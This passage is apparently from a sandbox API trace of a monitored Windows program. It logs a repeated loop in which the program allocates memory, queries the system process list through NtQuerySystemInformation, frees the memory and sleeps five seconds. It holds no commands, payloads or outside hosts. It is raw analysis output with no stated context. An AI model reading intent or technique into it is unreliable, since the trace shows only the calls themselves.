returned 0x0 [0244.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.421] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.427] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.433] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.434] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.439] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.445] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.452] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.459] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.465] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.472] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.478] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.488] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.494] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.501] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.507] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.513] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.515] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.520] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.526] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.533] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0244.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0244.540] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0244.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0244.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0244.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0244.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0244.542] NtQuerySystemInformation (in: 